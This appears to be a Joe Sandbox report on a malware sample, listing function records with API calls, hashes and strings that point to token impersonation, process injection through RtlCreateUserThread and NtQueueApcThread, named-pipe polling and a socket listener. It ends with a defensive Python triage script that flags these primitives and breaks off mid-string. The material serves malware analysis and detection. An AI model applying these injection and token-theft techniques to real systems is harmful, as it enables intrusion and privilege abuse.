                        • Opcode ID: 1bdd5497ac55f9ceee01cd46502ea43f72165348b95f2b256c95d8f9a827a5ec
                        • Instruction ID: a28ecd8c874c98ec03a9129b6a2e5b12298987ec2c6419a3f440fd8b53ab90a7
                        • Opcode Fuzzy Hash: 1bdd5497ac55f9ceee01cd46502ea43f72165348b95f2b256c95d8f9a827a5ec
                        • Instruction Fuzzy Hash: 1F118265B14A4085DE10E722F25126EA391ABD5FE4F484235BF6E4BB8AEF3CC5058741
                        APIs
                        • GetSystemTimeAsFileTime.KERNEL32 ref: 004019D5
                        • GetCurrentProcessId.KERNEL32 ref: 004019E0
                        • GetCurrentThreadId.KERNEL32 ref: 004019E8
                        • GetTickCount.KERNEL32 ref: 004019F0
                        • QueryPerformanceCounter.KERNEL32 ref: 004019FE
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                        • String ID:
                        • API String ID: 1445889803-0
                        • Opcode ID: 50bcba46724f9b704bab53f94a1f403ca93275f12098583a90ed55ecc7962461
                        • Instruction ID: e7f875539d2b8dca624fb493ee906b0c7b4db546ccc53074c796ddc42d9a9937
                        • Opcode Fuzzy Hash: 50bcba46724f9b704bab53f94a1f403ca93275f12098583a90ed55ecc7962461
                        • Instruction Fuzzy Hash: 09115EA6756B1482FB109B65FC0431973A0B788BF5F081671AE9D47BA4DE3CC589D708
                        APIs
                        • _errno.LIBCMT ref: 00D0A5FD
                          • Part of subcall function 00D01D18: _getptd_noexit.LIBCMT ref: 00D01D1C
                        • __doserrno.LIBCMT ref: 00D0A5F5
                          • Part of subcall function 00D01CA8: _getptd_noexit.LIBCMT ref: 00D01CAC
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _getptd_noexit$__doserrno_errno
                        • String ID:
                        • API String ID: 2964073243-0
                        • Opcode ID: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
                        • Instruction ID: 160babfe0ee68eeb78bec2b9eab9a55bb869375d8103608889068f3e66a12d26
                        • Opcode Fuzzy Hash: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
                        • Instruction Fuzzy Hash: 7FF0F072A01B0485EF09AB68C89132C6271DBA1B76FE94301D63E0B3E1CB3D84428732
                        APIs
                        • _errno.LIBCMT ref: 00A599FD
                          • Part of subcall function 00A51118: _getptd_noexit.LIBCMT ref: 00A5111C
                        • __doserrno.LIBCMT ref: 00A599F5
                          • Part of subcall function 00A510A8: _getptd_noexit.LIBCMT ref: 00A510AC
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _getptd_noexit$__doserrno_errno
                        • String ID:
                        • API String ID: 2964073243-0
                        • Opcode ID: 02e55afb5f5e5304a095475b8354770d2627f5ba6f47f1d288df05a1981eaf7d
                        • Instruction ID: 883d0679f1d1919d5d51651128383e97b4ac570ec3fedf5c2d628f1aae25d4a3
                        • Opcode Fuzzy Hash: 02e55afb5f5e5304a095475b8354770d2627f5ba6f47f1d288df05a1981eaf7d
                        • Instruction Fuzzy Hash: B4F06DB2721A4489EF052B68C99137D6661BBA1BB3F958305DF290B3D1CB78484A8721
                        APIs
                          • Part of subcall function 00A453EC: malloc.LIBCMT ref: 00A45408
                        • strrchr.LIBCMT ref: 00A452ED
                        • _snprintf.LIBCMT ref: 00A4539B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _snprintfmallocstrrchr
                        • String ID: Failed to impersonate token: %d$t permissions in process: %d
                        • API String ID: 3587327836-1492073275
                        • Opcode ID: d69273eeb4579e6a96eb8d0c87a60564a21875d7210b55cf29d23a145d20b21e
                        • Instruction ID: 0e66c91728b7f866e154fee2e8dee9ef1688cee72c739c1c98066314011f7c3e
                        • Opcode Fuzzy Hash: d69273eeb4579e6a96eb8d0c87a60564a21875d7210b55cf29d23a145d20b21e
                        • Instruction Fuzzy Hash: FE419125B0478086DB04FB22BA1576EABA2F7CAFD4F484124AE5A4B75ADF3CC442C701
                        APIs
                        • CreatePipe.KERNEL32 ref: 00CF28A3
                        • GetStartupInfoA.KERNEL32 ref: 00CF28AD
                        • Sleep.KERNEL32 ref: 00CF28F4
                          • Part of subcall function 00CF48D8: GetTickCount.KERNEL32 ref: 00CF48F1
                          • Part of subcall function 00CF48D8: GetTickCount.KERNEL32 ref: 00CF4932
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CountTick$CreateInfoPipeSleepStartup
                        • String ID: h
                        • API String ID: 1809008225-2439710439
                        • Opcode ID: 4e35baa7647db691c7f670eac516f3e1fc872cfd04f6cc2549e4bc2b31640604
                        • Instruction ID: 6a2b9923359f5f7a9f5fd177bc750d911f6df214ee824f1a38781dbd25da4be2
                        • Opcode Fuzzy Hash: 4e35baa7647db691c7f670eac516f3e1fc872cfd04f6cc2549e4bc2b31640604
                        • Instruction Fuzzy Hash: BB419A32604B889AD750CF65E84079EB7B5F788798F10421AEF9C53B68DF78DA46CB40
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: AccountInformationLookupToken_snprintf
                        • String ID: %s\%s
                        • API String ID: 2107350476-4073750446
                        • Opcode ID: 3628ba452fb9f12347beb94bf517dfb845e986fa94d428b7ed87531c0f30446e
                        • Instruction ID: c768fd1e3300265dfa509d5841e001c23f12ab42e7ddc82522b596c64fc95980
                        • Opcode Fuzzy Hash: 3628ba452fb9f12347beb94bf517dfb845e986fa94d428b7ed87531c0f30446e
                        • Instruction Fuzzy Hash: 56212F32204FC596DB24CF62E8447EA6769F788B88F548126EA8D57B58DF79C20AC740
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: RtlCreateUserThread$ntdll.dll
                        • API String ID: 1646373207-2935400652
                        • Opcode ID: ec9d2d620c63392f70290ebc437f8ca1b743032b52a150f3fdfac3901f9a5ced
                        • Instruction ID: aa12519914f8f143ee0efd3ffdb821d0d0099dbe1cceab9a09269643c7e491f1
                        • Opcode Fuzzy Hash: ec9d2d620c63392f70290ebc437f8ca1b743032b52a150f3fdfac3901f9a5ced
                        • Instruction Fuzzy Hash: 84016D32304B9492DB20CF51F88479AB7A8F798B80F99813AEA9D43B14DF38C565C700
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: NtQueueApcThread$ntdll
                        • API String ID: 1646373207-1374908105
                        • Opcode ID: 2536bb9452705a2f6e7169ceafa1b416df13a56cc0cf1ef56e7307e0eec9c158
                        • Instruction ID: 9e5c13fae2f2fd299b9897a0f39107e70a46ce60df2157ed6b43f7d9027b229d
                        • Opcode Fuzzy Hash: 2536bb9452705a2f6e7169ceafa1b416df13a56cc0cf1ef56e7307e0eec9c158
                        • Instruction Fuzzy Hash: 2301D635310B8192DB008B52F84436AB360F799FD0F544626DF6943B18DF38C6618300
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: IsWow64Process$kernel32
                        • API String ID: 1646373207-3789238822
                        • Opcode ID: ec429c199b0f6375f9f9bb3acfabef0345e96e1c9904636b59857b424156df6f
                        • Instruction ID: 93b8eb6bf33ebe620af8d9441cf9e9f840e95c896964fc374a8860354053fbce
                        • Opcode Fuzzy Hash: ec429c199b0f6375f9f9bb3acfabef0345e96e1c9904636b59857b424156df6f
                        • Instruction Fuzzy Hash: 0CE0267032170592FF09CB95F8903B66320EB88BC0F481012DA9B06361EF3CC2A9C720
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: Wow64RevertWow64FsRedirection$kernel32
                        • API String ID: 1646373207-3900151262
                        • Opcode ID: 319746fa707029ab9a73eb8f742d9554a97dfc1dcddc658422bf1e3b845b0c79
                        • Instruction ID: c1c5fbff0d8a7f656df8c83eb155b4e71726b0940a7ccc7d722dd0e4e648fbaa
                        • Opcode Fuzzy Hash: 319746fa707029ab9a73eb8f742d9554a97dfc1dcddc658422bf1e3b845b0c79
                        • Instruction Fuzzy Hash: 38D09E60751609A1FE199BD1B8557B45350AB5AB41F481026892A06360EE2DC6AAC324
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: Wow64DisableWow64FsRedirection$kernel32
                        • API String ID: 1646373207-736604160
                        • Opcode ID: ee7ac246b15703f1bae1af517107d06ce80ae1fd60a4afa284d23f3dc5206b46
                        • Instruction ID: 4f0676fb3b280bff73f3ec7e48106454d01ea0fa22108df8f19c892571d5d111
                        • Opcode Fuzzy Hash: ee7ac246b15703f1bae1af517107d06ce80ae1fd60a4afa284d23f3dc5206b46
                        • Instruction Fuzzy Hash: E9D0C770752609A1FE159BD1FC557F56350AB59B51F8C1027892E06360EE2DC6EBC334
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                        • Instruction ID: 79db1db834145f2f75f0045afc2ad07200c4c47ab65629c19ef0ba2e9ba9dbc8
                        • Opcode Fuzzy Hash: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                        • Instruction Fuzzy Hash: B451F13634274CC6EB58CF59EAC537873A1F3A8B54F24812ADA294B365CB38C452CB61
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                        • Instruction ID: 0b0cf0ab0738e023d968041074f436d7f7855b7fb0478d6c9a0789a6ed43815f
                        • Opcode Fuzzy Hash: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                        • Instruction Fuzzy Hash: 8951E67A715740CBD714CF29E94576873B0F799BA5F24812DDA0E4B361DB38C841CB62
                        APIs
                          • Part of subcall function 00A425F4: strchr.LIBCMT ref: 00A4262E
                          • Part of subcall function 00A425F4: strchr.LIBCMT ref: 00A4264C
                          • Part of subcall function 00A425F4: malloc.LIBCMT ref: 00A42664
                          • Part of subcall function 00A425F4: malloc.LIBCMT ref: 00A42671
                          • Part of subcall function 00A425F4: rand.LIBCMT ref: 00A4273D
                        • strchr.LIBCMT ref: 00A421D6
                        • _snprintf.LIBCMT ref: 00A4220C
                          • Part of subcall function 00A4EA3C: _errno.LIBCMT ref: 00A4EA73
                          • Part of subcall function 00A4EA3C: _invalid_parameter_noinfo.LIBCMT ref: 00A4EA7E
                        • _snprintf.LIBCMT ref: 00A42223
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: strchr$_snprintfmalloc$_errno_invalid_parameter_noinforand
                        • String ID: not create token: %d
                        • API String ID: 1095232423-2272930512
                        • Opcode ID: 9f33a31cc3dbe4d390e57a8e0463a50ad11e38a52d1dbdd6b3122e58f7288ae2
                        • Instruction ID: eccd5c040c1aa25d84091155aad8d1bb1154b9019914153fc50e0832bd24cf54
                        • Opcode Fuzzy Hash: 9f33a31cc3dbe4d390e57a8e0463a50ad11e38a52d1dbdd6b3122e58f7288ae2
                        • Instruction Fuzzy Hash: 0341916A604E8091EB11DF2AD2453E8A3B0FFD8B95F485512EF4867B21EF34D1B2C340
                        APIs
                        • malloc.LIBCMT ref: 00CF4A45
                          • Part of subcall function 00CFF284: _FF_MSGBANNER.LIBCMT ref: 00CFF2B4
                          • Part of subcall function 00CFF284: _NMSG_WRITE.LIBCMT ref: 00CFF2BE
                          • Part of subcall function 00CFF284: HeapAlloc.KERNEL32 ref: 00CFF2D9
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF2F2
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF2FD
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF308
                        • htonl.WS2_32 ref: 00CF4A5B
                          • Part of subcall function 00CF4C44: PeekNamedPipe.KERNEL32 ref: 00CF4C7C
                        • WaitForSingleObject.KERNEL32 ref: 00CF4AB6
                        • free.LIBCMT ref: 00CF4AF2
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$AllocHeapNamedObjectPeekPipeSingleWait_callnewhfreehtonlmalloc
                        • String ID:
                        • API String ID: 2495333179-0
                        • Opcode ID: 92903f8e34bb86019301daba1a442a9bec2b61465fa0227abaf91983d09bc4f7
                        • Instruction ID: 877cbfa982efca5e472f2526ce7d47b7430f87bc956f4c0e1c92402b5dd414e6
                        • Opcode Fuzzy Hash: 92903f8e34bb86019301daba1a442a9bec2b61465fa0227abaf91983d09bc4f7
                        • Instruction Fuzzy Hash: F921E136300A4881DBA8DF62E58033B73A9FB88B98F094515DF654B718DB38C9D2D34A
                        APIs
                        • _time64.LIBCMT ref: 00CFC254
                          • Part of subcall function 00D0145C: GetSystemTimeAsFileTime.KERNEL32 ref: 00D0146A
                          • Part of subcall function 00D0044C: _getptd.LIBCMT ref: 00D00454
                        • malloc.LIBCMT ref: 00CFC29C
                        • strtok.LIBCMT ref: 00CFC300
                        • strtok.LIBCMT ref: 00CFC311
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: Timestrtok$FileSystem_getptd_time64malloc
                        • String ID:
                        • API String ID: 460628555-0
                        • Opcode ID: 2fe16f1730b9e72f7102dc70ee842add604a2edc5f5efba699c173ab423aa684
                        • Instruction ID: 470ec5b1ea0da33478c463f2c2aa713a192373969e667419f6903c4e7e4507c5
                        • Opcode Fuzzy Hash: 2fe16f1730b9e72f7102dc70ee842add604a2edc5f5efba699c173ab423aa684
                        • Instruction Fuzzy Hash: 1021B2B6B10B9881DB44DF92E18866D77A8F798BE4B164226EF6A43781CF34C542C780
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: clock
                        • String ID:
                        • API String ID: 3195780754-0
                        • Opcode ID: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                        • Instruction ID: 690c8108c55fc787c61a19585598e0f092791f8757d2bf538924a1b5b4217cb8
                        • Opcode Fuzzy Hash: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                        • Instruction Fuzzy Hash: 72112B336047C549A771EEA7688062FF650F7847D4F1D0535EF6853705E975C991C720
                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00D0F5FC
                          • Part of subcall function 00D01600: _getptd.LIBCMT ref: 00D01616
                          • Part of subcall function 00D01600: __updatetlocinfo.LIBCMT ref: 00D0164B
                          • Part of subcall function 00D01600: __updatetmbcinfo.LIBCMT ref: 00D01672
                        • _errno.LIBCMT ref: 00D0F608
                          • Part of subcall function 00D01D18: _getptd_noexit.LIBCMT ref: 00D01D1C
                        • _invalid_parameter_noinfo.LIBCMT ref: 00D0F613
                        • strchr.LIBCMT ref: 00D0F629
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                        • String ID:
                        • API String ID: 4151157258-0
                        • Opcode ID: 981429a1da204f704ed88d261ee2d43387d2cfac4902a0026a6358d448239ec3
                        • Instruction ID: f53e7cb233a7d4344d4fcdc7d63083dfa4a666fa55ab6c943955384bf1478fa1
                        • Opcode Fuzzy Hash: 981429a1da204f704ed88d261ee2d43387d2cfac4902a0026a6358d448239ec3
                        • Instruction Fuzzy Hash: E21104626082E481CB359B25905033EA690E384FD4BBC4135EADE4BFE5DA6EC442C730
                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00A5E9FC
                          • Part of subcall function 00A50A00: _getptd.LIBCMT ref: 00A50A16
                          • Part of subcall function 00A50A00: __updatetlocinfo.LIBCMT ref: 00A50A4B
                          • Part of subcall function 00A50A00: __updatetmbcinfo.LIBCMT ref: 00A50A72
                        • _errno.LIBCMT ref: 00A5EA08
                          • Part of subcall function 00A51118: _getptd_noexit.LIBCMT ref: 00A5111C
                        • _invalid_parameter_noinfo.LIBCMT ref: 00A5EA13
                        • strchr.LIBCMT ref: 00A5EA29
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                        • String ID:
                        • API String ID: 4151157258-0
                        • Opcode ID: 89153f5c64fab27db57a2af5758249aa045b2e8adbb4ff24b9161b74b74b034e
                        • Instruction ID: ecda77193b7353e2196333aefe108c0c52390075b54b737de9864c20c102daaa
                        • Opcode Fuzzy Hash: 89153f5c64fab27db57a2af5758249aa045b2e8adbb4ff24b9161b74b74b034e
                        • Instruction Fuzzy Hash: 19110463A082E441DB29D735905023EBAA0F385BD7B5C8125FFD60BA55DA3CC749CB50
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: clock
                        • String ID:
                        • API String ID: 3195780754-0
                        • Opcode ID: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                        • Instruction ID: f7bcda0d092cdcee3feba0f7c45e2f24b3dec7c1386630aff635bf29a8a9c38d
                        • Opcode Fuzzy Hash: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                        • Instruction Fuzzy Hash: 03116633204788899738EFA6B59092BF690FB883E4F199035FF8543701EAB4C886CF00
                        APIs
                        • accept.WS2_32 ref: 00CFEF71
                        • send.WS2_32 ref: 00CFEFAF
                        • send.WS2_32 ref: 00CFEFC3
                        • closesocket.WS2_32 ref: 00CFEFD4
                          • Part of subcall function 00CFF098: closesocket.WS2_32 ref: 00CFF0A4
                          • Part of subcall function 00CFF098: free.LIBCMT ref: 00CFF0AE
                          • Part of subcall function 00CFF098: free.LIBCMT ref: 00CFF0B7
                          • Part of subcall function 00CFF098: free.LIBCMT ref: 00CFF0C0
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free$closesocketsend$accept
                        • String ID:
                        • API String ID: 47150829-0
                        • Opcode ID: caadc6cbf8b8aa9901aecb44ddbc265dbb6e74dc9ec5a2b89a727a9022558361
                        • Instruction ID: cc288ea08d1cf94697a08679dfe112c93369c78d8f55f80f826242d8f3a0050a
                        • Opcode Fuzzy Hash: caadc6cbf8b8aa9901aecb44ddbc265dbb6e74dc9ec5a2b89a727a9022558361
                        • Instruction Fuzzy Hash: 4401A23530494481EBA49B77F9A5B3D2322EB8DFF4F049212DF2607B95CE39C0918B41
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CountTick$NamedPeekPipeSleep
                        • String ID:
                        • API String ID: 1593283408-0
                        • Opcode ID: 210e21c30d6d06447862c16b29a5b20d0c0fb279467bc43041b9c33569e9406a
                        • Instruction ID: 7228bee35dcc6c38ce02a5cc6756511855cd889eee96dad63760c6e5c8abb8e3
                        • Opcode Fuzzy Hash: 210e21c30d6d06447862c16b29a5b20d0c0fb279467bc43041b9c33569e9406a
                        • Instruction Fuzzy Hash: 2AF02832314E50D2E710CB65F80032AB7A1F784B81F244021DF9843A34DF3DC4D18B06
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CountTick$NamedPeekPipeSleep
                        • String ID:
                        • API String ID: 1593283408-0
                        • Opcode ID: aac62254f3a365505a6a564a1f05aa253f383d98e2b7473c1e2f14b721fad9df
                        • Instruction ID: f13929b48e79b5734cd14f9d457f6b4cc44e562d4856b8d6427178fb93264005
                        • Opcode Fuzzy Hash: aac62254f3a365505a6a564a1f05aa253f383d98e2b7473c1e2f14b721fad9df
                        • Instruction Fuzzy Hash: 39F0FF32714A4092E3208B55F84033BB369F785B90F384120EB8942A78DF7EC9918B08
                        APIs
                        • InitializeProcThreadAttributeList.KERNEL32 ref: 00CF770E
                        • GetProcessHeap.KERNEL32 ref: 00CF7714
                        • HeapAlloc.KERNEL32 ref: 00CF7724
                        • InitializeProcThreadAttributeList.KERNEL32 ref: 00CF773F
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: AttributeHeapInitializeListProcThread$AllocProcess
                        • String ID:
                        • API String ID: 1212816094-0
                        • Opcode ID: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
                        • Instruction ID: fa8e01b2b425fad57215ce87d0542a78fb1813b5a85e2280ee1c1116b6a5b548
                        • Opcode Fuzzy Hash: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
                        • Instruction Fuzzy Hash: 98F09636724B4492DB95DF75B4507BA63A0EB88B90F58542BBB0B42714DE3DC4A58A10
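The records above are Joe Sandbox's raw per-function identifiers: explicit `Name.MODULE ref:` API lines where the APIs panel is expanded, plus an `API ID` (Joe's alphabetised concatenation of API-name fragments, so GetModuleHandle + GetProcAddress appears as `AddressHandleModuleProc`) and a `String ID` joining the function's strings with `$`. The Python script below is an added example, not part of this report or of Joe Sandbox: it parses records in exactly this shape (the sample input is constructed by copying five of the entries above) and maps each one to the capability it implies: runtime resolution of `RtlCreateUserThread` / `NtQueueApcThread` from ntdll, the `CreatePipe` / `GetStartupInfoA` / `Sleep` / `GetTickCount` chain, the `InitializeProcThreadAttributeList` record, and the `accept` / `send` listener. The capability rules, the wording of the findings, the added `NtCreateThreadEx` entry and the function names are this example's own heuristics, not Joe Sandbox signatures.

```python
"""Triage helper for Joe Sandbox function records: an added example, not code from the
report or from Joe Sandbox. It parses the '• Name.MODULE ref:' API lines and the 'API ID',
'String ID' and 'Opcode ID' fields of records like those above; the rules are heuristics."""
import re
from dataclasses import dataclass, field

API_LINE = re.compile(r"•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?([\w:]+)\.(\w+) ref:")
FIELD_LINE = re.compile(r"•\s*([^:]+?):\s*(.*)$")
# Native thread/APC primitives a beacon resolves by hand: the two seen in the dumps above
# plus NtCreateThreadEx, included as a common equivalent (an assumption of this example).
INJECTION_PRIMITIVES = {"NtQueueApcThread", "RtlCreateUserThread", "NtCreateThreadEx"}

# Constructed sample: five records copied in the shape they appear in the report above.
SAMPLE_REPORT = """\
• CreatePipe.KERNEL32 ref: 00CF28A3
• GetStartupInfoA.KERNEL32 ref: 00CF28AD
• Sleep.KERNEL32 ref: 00CF28F4
  • Part of subcall function 00CF48D8: GetTickCount.KERNEL32 ref: 00CF48F1
• API ID: CountTick$CreateInfoPipeSleepStartup
• String ID: h
• Opcode ID: 4e35baa7647db691c7f670eac516f3e1fc872cfd04f6cc2549e4bc2b31640604
• Instruction Fuzzy Hash: BB419A32604B889AD750CF65E84079EB7B5F788798F10421AEF9C53B68DF78DA46CB40
• API ID: AddressHandleModuleProc
• String ID: RtlCreateUserThread$ntdll.dll
• Opcode ID: ec9d2d620c63392f70290ebc437f8ca1b743032b52a150f3fdfac3901f9a5ced
• Instruction Fuzzy Hash: 84016D32304B9492DB20CF51F88479AB7A8F798B80F99813AEA9D43B14DF38C565C700
• API ID: AddressHandleModuleProc
• String ID: IsWow64Process$kernel32
• Opcode ID: ec429c199b0f6375f9f9bb3acfabef0345e96e1c9904636b59857b424156df6f
• Instruction Fuzzy Hash: 0CE0267032170592FF09CB95F8903B66320EB88BC0F481012DA9B06361EF3CC2A9C720
• InitializeProcThreadAttributeList.KERNEL32 ref: 00CF770E
• GetProcessHeap.KERNEL32 ref: 00CF7714
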